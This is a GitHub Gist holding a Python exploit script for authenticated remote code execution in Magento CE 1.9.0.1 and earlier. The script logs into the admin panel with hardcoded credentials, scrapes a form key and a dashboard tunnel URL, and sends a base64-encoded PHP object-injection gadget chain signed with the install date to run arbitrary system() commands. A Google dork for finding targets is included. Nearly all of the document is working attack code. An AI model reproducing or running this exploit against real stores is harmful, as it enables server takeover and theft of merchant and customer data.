Created
July 15, 2020 00:37
-
-
Save Mah1ndra/b15db547dfff13696ddd4236dd238e45 to your computer and use it in GitHub Desktop.
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution : php/webapps/37811.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
# Google Dork: "Powered by Magento" | |
# Date: 08/18/2015 | |
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
# Vendor Homepage: http://magento.com/ | |
# Software Link: https://www.magentocommerce.com/download | |
# Version: 1.9.0.1 and below | |
# Tested on: Ubuntu 15 | |
# CVE : none | |
from hashlib import md5 | |
import sys | |
import re | |
import base64 | |
import mechanize | |
def usage(): | |
print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" | |
sys.exit() | |
if len(sys.argv) != 3: | |
usage() | |
# Command-line args | |
target = sys.argv[1] | |
arg = sys.argv[2] | |
# Config. | |
username = 'mah1ndra' | |
password = 'mah1ndra' | |
php_function = 'system' # Note: we can only pass 1 argument to the function | |
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml | |
# POP chain to pivot into call_user_exec | |
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \ | |
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \ | |
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \ | |
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \ | |
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \ | |
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, | |
len(arg), arg) | |
# Setup the mechanize browser and options | |
br = mechanize.Browser() | |
br.set_proxies({"http": "localhost:8080"}) | |
br.set_handle_robots(False) | |
request = br.open(target) | |
br.select_form(nr=0) | |
#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. | |
br.form.fixup() | |
br['login[username]'] = username | |
br['login[password]'] = password | |
br.method = "POST" | |
request = br.submit() | |
content = request.read() | |
url = re.search("ajaxBlockUrl = \'(.*)\'", content) | |
url = url.group(1) | |
key = re.search("var FORM_KEY = '(.*)'", content) | |
key = key.group(1) | |
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key) | |
tunnel = re.search("src=\"(.*)\?ga=", request.read()) | |
tunnel = tunnel.group(1) | |
payload = base64.b64encode(payload) | |
gh = md5(payload + install_date).hexdigest() | |
exploit = tunnel + '?ga=' + payload + '&h=' + gh | |
try: | |
request = br.open(exploit) | |
except (mechanize.HTTPError, mechanize.URLError) as e: | |
print e.read() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment